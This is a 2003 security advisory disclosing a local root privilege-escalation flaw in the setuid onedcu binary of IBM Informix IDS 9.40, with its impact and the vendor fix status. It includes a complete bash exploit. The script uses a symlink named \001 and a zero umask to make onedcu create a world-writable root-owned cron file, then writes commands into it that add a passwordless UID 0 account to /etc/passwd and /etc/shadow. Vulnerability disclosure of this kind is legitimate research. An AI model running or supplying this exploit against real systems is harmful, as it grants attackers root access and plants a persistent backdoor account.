----------========== OPEN3S-2003-08-08-eng-informix-onedcu ==========----------
----------========== OPEN3S-2003-08-08-eng-informix-onedcu
==========----------
Title: Local Vulnerability in IBM Informix IDSv9.40 onedcu binary
Date: 08-08-2003
Platform: Only tested in Linux but can be exported to others.
Impact: Users with exec perm over ./bin/onedcu can create files
with 666 mode and owned by root.
Author: Juan Manuel Pascual Escriba <pask@xxxxxxxxxx>
Status: Solved by IBM Corp.
PROBLEM SUMMARY:
There is a write permisions checking error in onedcu binary that can be used
by local
users with exec perm over onedcu to write any file owned by root with mode 666.
DESCRIPTION
onedcu is installed with 6755 perm and owned by root.informix in my default
installation
[informix@dimoni onedcu]$ ls -alc /home/informix-9.40/bin/onedcu
-rwsr-sr-x 1 root informix 1066468 Aug 8 23:39
/home/informix-9.40/bin/onedcu
The binary does'nt drop privileges before writing the log and writes \001 file
owned by root:
IMPACT:
Easy to overwrite or create new files owned by root (.rhosts, cron
files) via link
injection.
EXPLOIT
#!/bin/bash
ONEDCU=/home/informix-9.40/bin/onedcu
CRONFILE=/etc/cron.hourly/pakito
USER=pakito
DIR=./trash
export INFORMIXDIR=/home/informix-9.40/
export ONCONFIG=onconfig.std
if [ -d $DIR ]; then
echo Trash directory already created
else
mkdir $DIR
fi
cd $DIR
if [ -f ./"\001" ]; then
echo Link Already Created
else
ln -s $CRONFILE `echo -e "\001"`
fi
umask 000
$ONEDCU &
kill -9 `pidof $ONEDCU`
echo "echo "#!/bin/bash"" > $CRONFILE
echo "echo "$USER:x:0:0::/:/bin/bash" >> /etc/passwd" >> $CRONFILE
echo "echo "$USER::12032:0:99999:7:::" >> /etc/shadow" >> $CRONFILE
echo " "
echo " This vulnerability was researched by Juan Manuel Pascual Escriba"
echo " 08/08/2003 Barcelona - Spain pask@xxxxxxxxxx
echo " "
echo " must wait until cron execute $CRONFILE and then exec su pakito"
STATUS
Reported to IBM security team at 11th of August 2003
See more infomartion about this vulnerability and workaround at:
http://www-1.ibm.com/support/docview.wss?uid=swg21153336
This vulnerability was managed in an efficient manner by Jonathan Leffler
from IBM Informix Database Engineering Team.
--------------------------------------------------
This vulnerability was researched by:
Juan Manuel Pascual Escriba pask@xxxxxxxxxx
Barcelona - Spain http://www.open3s.com